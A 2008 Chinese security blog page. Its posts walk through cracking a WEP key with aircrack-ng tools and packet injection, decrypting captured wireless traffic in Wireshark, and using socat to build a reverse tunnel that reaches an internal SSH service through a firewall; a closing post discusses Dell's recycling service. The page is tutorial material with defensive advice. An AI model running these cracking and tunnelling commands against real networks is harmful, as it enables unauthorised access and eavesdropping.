搜尋此網誌

2008年11月26日 星期三

無線網路封包擷取

在之前的文章 - WEP Cracking - 中我談到如何破解WEP的金鑰。破解金鑰之後有甚麼用途?
  1. 可以加入無線網路成為其中的一份子,然後"使用"其內部的相關網路資源。
  2. 可以透過此一無線網路對其他網際網路的主機進行"非法存取"。
  3. 可以竊取此一無線網路上所傳遞的資訊。
  4. 可以監看此一無線網路上的使用狀況。
基本上3跟4是類似的事情,不過4是屬於合法的使用,而3則屬於非法的行為。在此我不鼓勵也不從事非法的行為(項目1-3),所以我這次要談的是4的應用。

還記得上次我們在破解WEP金鑰的時候,有產生一個封包的紀錄檔 (wifi-01.cap)。這個檔案紀錄了當時所擷取到的封包,只不過封包的內容是經過WEP加密的。aircrack-ng有一個工具,可以幫我們進行解密的動作。指令為
airdecap-ng -e 00:XX:XX:XX:XX:3C -w 61xxxxxxxxxxxxxxxxxxxxxxxx wifi-01.cap
其中61xxxxxxxxxxxxxxxxxxxxxxxx就是WEP的金鑰,唯必須使用16進位的方式加以表示。解密後的封包會寫入wifi-01-dec.cap,這個檔案就可以直接用packet analyzer(如wireshark)打開並觀看到其中的原始內容了。

不過上述方式需要手動執行兩個分別的動作,而且不能夠即時看到封包內容,很明顯跟我們熟悉的方式有一段差距。幸運的是,有不少工具可以即時對WEP進行解密,並顯示封包的內容,其中包含最好用的免費軟體之一 - wireshark。實際上,wireshark不只能夠解開WEP的加密,也可以解開WPA的加密方式。方法如下:

  1. 打開wireshark。
  2. 選擇Edit->Preferences,其中左方有一個IEEE 802.11的設定畫面,把我們所知道的WEP金鑰鍵入,同樣要使用16進位的格式。
  3. 選擇"OK"完成設定。
  4. 進行監測,可以即時看到解密後的封包。
  5. 當封包數量過多而你只想要觀看單一電腦的封包,同樣可以透過filter的方式。如果你使用Capture Filter的話,要記得必須使用MAC Address的方式加以設定,而不能使用IP Address。那是因為解密前只有MAC Address的資訊可以取得。

2008年11月25日 星期二

WEP Cracking

無線網路(WiFi)的方便性與其帶來的安全危害,一直是一個兩難的問題,尤其對於企業更是如此。其中一個問題,就是WiFi使用的傳輸方式(無線電)不像傳統有線網路那般"不容易"被攔截。任何人只要有一個無線網路的介面(這個已經是筆記性電腦的標準備配),在適當的範圍內,就可以分享你的網路與其上的資訊。而透過一些特殊的工具,可以使用的距離甚至比你想像的還要遠很多。

針對資料容易被監測的問題,當然就是採用加密的方式加以解決。目 前一般有WEP、TKIP(WPA)與CCMP(WPA2)三種。其中WEP因為一些設計的問題,很容易被破解,而WPA於日前也被部分破解了。儘管如 此,有些無線網路仍舊使用WEP的方式,尤其是一些家庭用的無線網路更容易發生。

破解WEP的原理與工具其實已經存在很久了,有些(如 Airsnort)甚至只要一兩個步驟就可以加以破解。傳統上,破解有線網路的協定可以使用任何支援Ethernet的網路卡,但是對於破解WEP而言, 並不是所有的無線網卡都提供相同的能力。甚至同樣的無線網卡,在不同的組態下,可能都會有不同的效果。

以監測封包而言,傳統網卡使用的是 Promiscuous Mode,以便擷取所有流經線路上的封包。但是對於無線網卡而言,因為同一個地區可能有多個無線網路,所以採用不一樣的方式。無線網卡使用Monitor Mode,以便擷取所有的訊號。又WiFi有多個無線頻道可以使用,所以必須透過頻道輪流掃描的方式擷取封包,或是僅針對特定的頻道擷取封包。所以有可能還是會有漏網之魚(封包)。另外,如果要對無線網路"塞"假造的封包(這樣的動作稱之為Packet Injection),更是需要無線網卡本身有支援這樣的功能才行。所以,儘管相容性已經有大幅的改善,但是還是要有合適的無線網卡,才能夠有效的加以操作。Packet Injection為什麼這麼重要,看了後面的範例你就知道了。

我試過BackTrackWifislax兩 個Live CD,也使用過筆記型電腦與外接的USB無線網卡,各種組合都有其不同的步驟,有些組合甚至可能會有不同的結果。Wifislax預設是採用西班牙文的介面,所以使用上較為不方便,以下的範例我就使用BackTrack 3.0 + ASUS WL-167g + aircrack-ng,無線網路則是使用自己的無線基地台:
  1. 使用BackTrack Live CD開機
  2. 鍵入指令 iwconfig 查看是否有抓到無線網卡。我的無線網卡名稱是rausb0
  3. 鍵入指令 airodump-ng rausb0 查看所有可接受到的基地台訊號。我們的目標是第二個無線基地台,其使用WEP的加密方式。需要特別注意的是BSSID、CH、與ESSID這三個資訊,後面的指令會用到。
  4. 鍵入指令 airmon-ng stop rausb0 以便關閉無線網卡的Monitor模式。
  5. 鍵入指令 iwconfig rausb0 essid Sxxxxxxxxxx key 1234567890123,其中Sxxxxxxxxxx須使用步驟2所看到的ESSID。而1234567890123則隨便填,並非真正的加密金鑰。成功後再次鍵入指令 iwconfig 確認設定生效。
  6. 鍵入指令 ariodump-ng -c 11 -w wifi --bssid 00:XX:XX:XX:XX:3C rausb0 以便擷取封包並記錄到檔案(wifi),以利後續之分析動作。其中11為步驟2中所看到的CH、而00:XX:XX:XX:XX:3C則為步驟2中所看到的BSSID。執行後我們需要特別注意的是Data這個欄位,如果收集到足夠的量就可以了(我收集了200,000個左右)。對於使用中的網路,這個值可能不難達成,但是如果你需要加快收集的速度,或是沒有其他人在使用這個無線網路,你就需要額外多做後面兩個動作,也就是Packet Injection。
  7. 鍵入指令 aireplay-ng -1 0 -a 00:XX:XX:XX:XX:3C -h 00:0A:FD:3A:79:7B -e Sxxxxxxxxxx rausb0 ,對無線基地台做驗證的動作。其中00:XX:XX:XX:XX:3C與Sxxxxxxxxxx請參考步驟2所查到的資訊,而 00:0A:FD:3A:79:7B是為了改變封包所使用的MAC位址,所以亂填即可。
  8. 鍵入指令 aireplay-ng -3 -b 00:XX:XX:XX:XX:3C -h 00:0A:FD:3A:79:7B rausb0 ,對無線基地台進行大量Packet Injection的動作。成功後應該會看到步驟6畫面的Data數值加快成長。
  9. 收集足夠的資料後,停止airodump-ng與aireplay-ng的指令執行。
  10. 鍵入指令 aircrack-ng -n 128 -b 00:XX:XX:XX:XX:3C wifi-01.cap 執行破解WEP金鑰。只要有足夠的量,破解的時間很快(我使用的範例是0秒 )。

所以我們要如何增進無線網路的安全呢?下列簡單的建議事項提供參考(僅就避免無線網路被濫用或監看而言):
  1. 使用較安全的加密協定,如WPA2/CCMP。
  2. 使用MAC Address Filter,限制特定的網卡使用無線網路。不過因為MAC Address並沒有加密,所以有可能被監測到並被竊取。
  3. 將無線網路當作外部的網路,而不是內部網路的一份子。也就是必要時採用VPN的技術,讓無線網路的使用者擁有更高的安全性。
  4. 確認無線基地台的涵蓋範圍,必要時加以限制。
  5. 最重要的是,擁有一個明確的無線網路使用規範。
對於有關無線網路安全較完整的說明,可參考Cisco所發表的文章-Five Ways to Improve Your Wireless Security

2008年11月24日 星期一

反向連結 (Reverse Connection)

傳統上,保護電腦主機的方式最基本的就是關閉不必要的服務,並且透過防火牆等網路設備避免外界連結非公開的服務。甚至,有些電腦主機並沒有所謂公開的IP位址(Public IP Address),進一步封鎖外界直接加以連結的管道。也就是說,在網際網路上想要連結到某個電腦主機,除了必須知道特定的公開IP位址(可能在電腦主機本身,也可能在NAT之類的設備),中間還必須沒有其他的設備加以阻擋。所以我們可以透過前述的方式避免不相干的人士(嘗試)連結到我們的電腦主機,從事破壞性的工作。

除了限制外面的人連到內部的電腦主機,更嚴謹的作法是限制電腦主機主動對外進行連線。因為一般的電腦主機僅執行特定的功能,所以對外進行連線動作通常是可以事先預期的,有些甚至是可以完全不需要對外連線。限制的方法可以從網路端著手(如網路型的防火牆),也可以從電腦主機本身加以限制(如Linux下的iptables,或是其他主機型的防火牆)。從網路上著手當然有其方便性,而且有集中式管理的好處,但是如果要符合每個電腦主機的需求,可能會產生過多的規則而影響了防火牆的效能。所以就像所有的安全機制一樣,我們可以同時從網路端與主機端著手,以達到截長補短之效。

雖然理論上幾乎大部分的電腦主機不需要主動對外連線,但是因為現在包含作業系統在內,大多都有主動線上更新的機制,所以除非你有在內部網路建置更新的環境,否則都至少會有連到更新網站的需求。而結果是,只要開放一個Port,透過Tunneling的技術,幾乎可以連到外部所有的服務。更甚者,透過Reverse Connection/Reverse Tunneling的方法,可以讓外界連到內部電腦主機上任意的服務。

一般的網路應用在進行連結時,都是由使用服務的電腦(又稱之為Client)向提供服務的電腦(又稱之為Server)發出連線的請求,待Server回應後才開始後續的動作(如驗證、傳送特定內容等)。而Reverse Connection則是將這樣的應用反過來,讓提供服務的電腦主動對使用服務的電腦進行連線的動作。這樣作有甚麼用?最簡單的應用就是可以讓駭客或是不懷好意的員工隨時從外部進入你的電腦主機搞鬼,甚至是搬"一些"資料出來。

這類工具早期以netcat為首,不過netcat已經很久沒有維護了,所以接下來我用socat這個軟體進行一個簡單的示範。基本上,不管是netcat或是socat,本身並沒有隱藏的功能,所以比較容易從主機上被發現其存在或正在執行中。至於網路上的流量,可以透過一些加密的協定(如SSH)來達到避免被偵測的目的。以下就開始說明此一範例:

1. 準備兩台電腦,一台IP是192.168.0.11,另外一台10.10.10.104。雖然兩台電腦都屬於Private IP Address,但是我的測試環境是將192.168.0.11當作是Public IP Address,也就是10.10.10.104這台電腦可以直接連到192.168.0.11,但是192.168.0.11卻連不到10.10.10.104。


2. 在10.10.10.104這台電腦執行
socat -d -d -d -t5 tcp:192.168.0.11:80,forever,intervall=10,fork tcp:localhost:22
此指令會讓10.10.10.104這台電腦不斷嘗試連到192.168.0.11的TCP port 80(也就是一般Web使用的Port,通常在企業是允許對外使用的),當連結成功後會連到本身的SSH服務(TCP Port 22)。

3. 在192.168.0.11這台電腦執行
socat -d -d -d tcp-l:8080,reuseaddr,bind=192.168.0.11,fork tcp-l:80,bind=192.168.0.11,reuseaddr,retry=10
此指令會讓192.168.0.11這台電腦使用TCP Port 8080讓其他電腦進行連結,當連結上後會連結到TCP Port 80。而因為TCP Port 80已經被10.10.10.104這台電腦進行連結並轉至本身的SSH服務,所以等於讓其他電腦直接連結到10.10.10.104的SSH服務。

4. 使用SSH連線軟體(如Putty),對192.168.0.11的TCP Port 8080進行SSH連線。當出現登入畫面後要打入10.10.10.104主機的帳號與密碼,而非192.168.0.11的帳號。登入成功後,透過ifconfig確認已經進入10.10.10.104這台主機。



5. 使用wireshark查看,確認之間傳遞的封包都經過加密處理。


經由上述簡單的範例,我們可以看到如何有效繞過防火牆的機制,連線到內部主機的服務。所以我們除了限制電腦主機可以主動對外進行連線的Port外,最好也加上允許連線的外部IP位址。此外,不管有沒有限制可以連線的IP位址,對於主機對外連線的使用,最好加以記錄。另外,當然也包含了主機本身的防護(如執行程式/Rootkit的偵測)。老話一句,多管齊下才是邁向更為安全之道。

2008年11月15日 星期六

Dell不只想靠新電腦賺錢,連舊的都不放過

Dell,這家靠著Build-to-Order策略拿下全球PC出貨亞軍的公司,這回也跟資安沾上了邊。Dell打的主義,就是利用電腦回收來賺錢。理論上,有多少的電腦出貨就應當有多少的電腦需要回收(只是時間的問題),所以數量有多大,我只能說超級大。其實這個並不是Dell最近才推出的業務,但是因為相關議題的被重視,所以Dell自然得趁勢好好地推銷一下。

看不見就等於不存在? - 如何安全刪除檔案  這篇文章中,我簡單帶到該如何刪除硬碟內的資料以及未正確刪除資料所可能面臨的問題。不但對個人如此,對企業而言所面臨的風險更加嚴重。所以對於資訊設備的汰換,應該有一定的處理流程,以確保公司的資料不會在外流浪。而Dell想做的,就是用一個完整的程序幫企業處理不用的舊資訊設備。當然,現在流行的Green-IT,自然也沒被Dell放過。回收品都會被取出所有可回收的部分加以利用,甚至有可能可以直接轉賣舊的元件給第三方(企業跟Dell是91分帳)。所以不但可以達到安全的報廢處理程序,也兼顧了環保,真是一舉兩得。此外,完整的處理程序紀錄,也可以達到符合資安政策或規範的要求。

台灣之前有所謂的回收獎勵金,不過種類並不齊全,而且是以環保為出發點。所以,回收品內的資料到哪去了,沒有人知道。甚至處理的流程是不是環保,也沒有人在乎,因為通常在乎的是那獎勵金。不管從安全還是環保的角度,"正確地"處理大量的回收資訊設備都是很重要的一個議題。如果透過Dell這樣的大公司,能夠帶起這樣的風潮,也算是功德一件。 如果再進一步把這個服務包含在Dell自己銷售出去的機器(至少是企業用的伺服器),我想那就更好了。只不過對Dell而言,幾乎甚麼東西都是選配,所以回收的服務依舊需要額外的費用,實在甚為可惜。

About